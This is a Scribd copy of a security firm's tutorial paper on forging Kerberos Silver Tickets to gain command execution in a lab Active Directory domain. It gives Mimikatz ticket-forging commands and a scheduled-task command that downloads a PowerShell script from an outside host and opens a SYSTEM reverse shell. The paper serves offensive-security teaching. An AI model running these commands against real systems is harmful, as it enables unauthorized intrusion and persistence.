Scribd
Upload
31 views12 pages

Kerberos: Achieving Command Execution Using Silver Tickets: Haboob Team

The document discusses the technique of achieving command execution in an Active Directory environment using Silver Tickets, which are forged service authentication tickets that do not require communication with the Domain Controller, making them harder to detect. It outlines the requirements for executing this attack, including necessary information and tools, and provides demonstrations of command execution through PowerShell Remoting and Scheduled Tasks. The document also highlights the potential for using other services like WMI and WinRM for similar attacks.

Uploaded by

21020028 Trần Quang Tài
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
31 views12 pages

Kerberos: Achieving Command Execution Using Silver Tickets: Haboob Team

The document discusses the technique of achieving command execution in an Active Directory environment using Silver Tickets, which are forged service authentication tickets that do not require communication with the Domain Controller, making them harder to detect. It outlines the requirements for executing this attack, including necessary information and tools, and provides demonstrations of command execution through PowerShell Remoting and Scheduled Tasks. The document also highlights the potential for using other services like WMI and WinRM for similar attacks.

Uploaded by

21020028 Trần Quang Tài
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Kerberos: Achieving Command

Execution using Silver Tickets

By Haboob Team
Achieving Command Execution using Silver Tickets

Table of Contents
1. Introduction ................................................................................................................................................... 2

2. What is Silver Ticket? .................................................................................................................................... 2

3. Attack Analysis .............................................................................................................................................. 3

4. Attack Requirements ..................................................................................................................................... 4

5. Attack Demonstration ................................................................................................................................... 4

A. Command Execution using PowerShell Remoting ......................................................................................... 6

B. Command Execution using Scheduled Tasks ................................................................................................. 9

6. References ................................................................................................................................................... 11

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 1


Achieving Command Execution using Silver Tickets

1. Introduction
In this paper we are going to talk about achieving command execution using silver tickets in active
directory enterprise. This technique relies on several SPNs to be used in a specific way to achieve
command execution on any targeted machine. This technique can be used as a persistence or post-
exploitation technique

2. What is Silver Ticket?


A Silver Ticket is a forged service authentication ticket, it also called Ticket Granting Service tickets TGS
(it could be a computer account or user account). As shown in the following graphics, since a Silver
Ticket is a forged TGS, there is no communication with the Domain Controller (AS-REQ / AS-REP and
TGS-REQ / TGS-REP) when using Silver Tickets. So Silver Tickets are harder to detect than Golden
Tickets because there is no communication between the service and the DC, and any logging is local to
the targeted computer. So, it’s very useful to use this attack as a persistence technique.

Figure 1: Normal Authentication in AD

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 2


Achieving Command Execution using Silver Tickets

Figure 2: Silver ticket process do not communicate with DC

3. Attack Analysis
Basically, forging silver tickets are always required a targeted service account, which must be available
on the targeted machine such as (cifs, mssql, time, rpcss, …..etc.). in any windows environment there are
many ways to execute remote commands to a remote system, when saying a (remote) word, this means
we need a service to connect to, and then do the thing that we connect for like (command execution).
Here are some examples for these service Types:

• PowerShell Remoting
• Windows Management Instrumentation (WMI)
• scheduled tasks (remotely)
• Windows Remote Management (WinRM)

Each one of these methods needs a service or a couple of services to be used. So, using silver ticket on
these services we can achieve a command execution.

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 3


Achieving Command Execution using Silver Tickets

4. Attack Requirements
There are several requirements for this attack to be done using Invoke-Mimikatz.ps1:

• We need to determine Username for which the TGT is generated (it can be any fake user)
but it will be stealthier if we use a real domain user.
• Domain’s SID
• Target servers FQDN
• The SPN name of service for which TGS is to be created
• NTLM (rc4) of the targeted server account.

5. Attack Demonstration
In this section, we are going to demonstrate the attack.

Assuming that we got the NTLM (rc4) of our target server server2$ account during our post-
exploitation. However, now we are demonstrating our attack from (server1.habooblab.local) and we are
trying to achieve a command execution on (server2.habooblab.local).

First, we need to collect some information using PowerView.ps1 or Active Directory PowerShell module,
we already compromised server1 and got a domain user (anyuser) has local admin privilege on server1

Figure 3: local admin access on server1

Also our current user (anyuser) does not have any privileges or access to the target server (server2)

Figure 4: our current user does not have any access on server2

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 4


Achieving Command Execution using Silver Tickets
As we mentioned earlier, we already have the NTLM (rc4) of server2$ account, so we need to get to
domain’s SID to complete our attack requirement

Figure 5: Domain SID.

Now, we need to choose the SPN name of service for which TGS is to be created, keep in your mind this
service must be existed in the targeted server, here a table for some service types with their service
name, but not all of them

Service Type Service(s) to be used in Silver Ticket

PowerShell Remoting HOST, HTTP (OR WSMAN RPCSS) depends on OS

Windows Management Instrumentation (WMI) HOST, RPCSS

Windows Remote Management (WinRM) HOST, HTTP

Scheduling Tasks HOST

Now, since we have all the required information, we can use Invoke-Mimikatz.ps1 to proceed our attack

The command we will use is:


Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid: S-1-5-21-
1658214835-4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:SERVICEX /rc4:
5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 5


Achieving Command Execution using Silver Tickets

Here an explanation of Mimikatz command,

Command argument Explanation

kerberos::golden Name of the module to be used for silver tickets

/domain Domain’s FQDN

/sid Domain’s SID

/target Target server FQDN

/service SPN name of service for which TGS is to be created

/rc4 Target server account NTLM (rc4)

/user Any domain user (fake user will work also)

/ptt To pass the ticket to current session instead of saving it on the disk.

A. Command Execution using PowerShell Remoting


As we mentioned earlier, PowerShell Remoting uses couple of services to work (HOST, HTTP) (OR
WSMAN RPCSS) depends on OS, so we need to create a silver ticket for these services to be able to
use them against our target server (server2.habooblab.local).

The command of HOST service is


Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-
4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HOST
/rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

The command of HTTP service is


Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-
4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HTTP
/rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

Note that (realdomainuser) is a normal domain user with no access to server2.habooblab.local server.

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 6


Achieving Command Execution using Silver Tickets
Here we forged a two silver tickets for HOST & HTTP services which are required for PowerShell
Remoting service on a remote system (server2.habooblab.local)

Figure 6: HOST Service ticket

And here for HTTP service, you can see klist output in Figure 8. We have two injected tickets

Figure 7: HTTP service ticket

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 7


Achieving Command Execution using Silver Tickets

Figure 8: klist indicates injected tickets in current session

Now we can execute commands on server2.habooblab.local using Invoke-Command which give us an


ability to execute PowerShell commands on Remote system.

Figure 9: command execution access on server2 using Invoke-command after using host tickets

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 8


Achieving Command Execution using Silver Tickets

B. Command Execution using Scheduled Tasks


Similar to PowerShell Remoting process, but here we need to create a silver ticket for one service only
which is HOST so we can Schedule a Task on with SYSTEM Privileges (server2.habooblab.local).

The command of HOST service is


Invoke-Mimikatz -Command '"kerberos::golden /domain:HABOOBLAB.LOCAL /sid:S-1-5-21-1658214835-
4080897459-805581888 /target:SERVER2.HABOOBLAB.LOCAL /service:HOST
/rc4:5fe0972111184bc3a6fba69221fca7d8 /user:realdomainuser /ptt"'

Here we injected HOST ticket to our session using Invoke-Minikatz.ps1, as we did in PowerShell
Remoting.

Figure 10: HOST tickets to use Scheduled Tasks

Now, we can Schedule a task to be run on remote server (server2.habooblab.local) with SYSTEM
privilege, here to tasked a PowerShell command which give us a reverse shell using Invoke-
PowerShellTcp.ps1

This command for scheduling task on server2.habooblab.local


schtasks /create /S server2.habooblab.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "pwntask" /TR
"powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://10.10.10.2/Invoke-
PowerShellTcp.ps1''');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.2 -Port 443'"

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 9


Achieving Command Execution using Silver Tickets
This command to run the scheduled task on the remote server (server2.habooblab.local)
schtasks /Run /S server2.habooblab.local /TN "pwntask"

Figure 11: Scheduling task on and running it on remote target server2.habooblab.local

Figure 12: Reverse Shell on server2 with system privileges after running the task from server1

Finally, the same approach can be used with the other services like WMI, WinRM. Keep in your mind
some services can give more than command execution such as LDAP service which allows you to gain
and use DCSync rights.

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 10


Achieving Command Execution using Silver Tickets

6. References
[1] https://adsecurity.org/?page_id=183

[2] https://adsecurity.org/?p=2011

[2] https://www.varonis.com/blog/kerberos-attack-silver-ticket/

[3] https://en.hackndo.com/kerberos-silver-golden-tickets/

[4] https://www.varonis.com/blog/kerberos-authentication-explained/

Copyright © 2020 Haboob Contact Haboob: info@haboob.sa 11

You might also like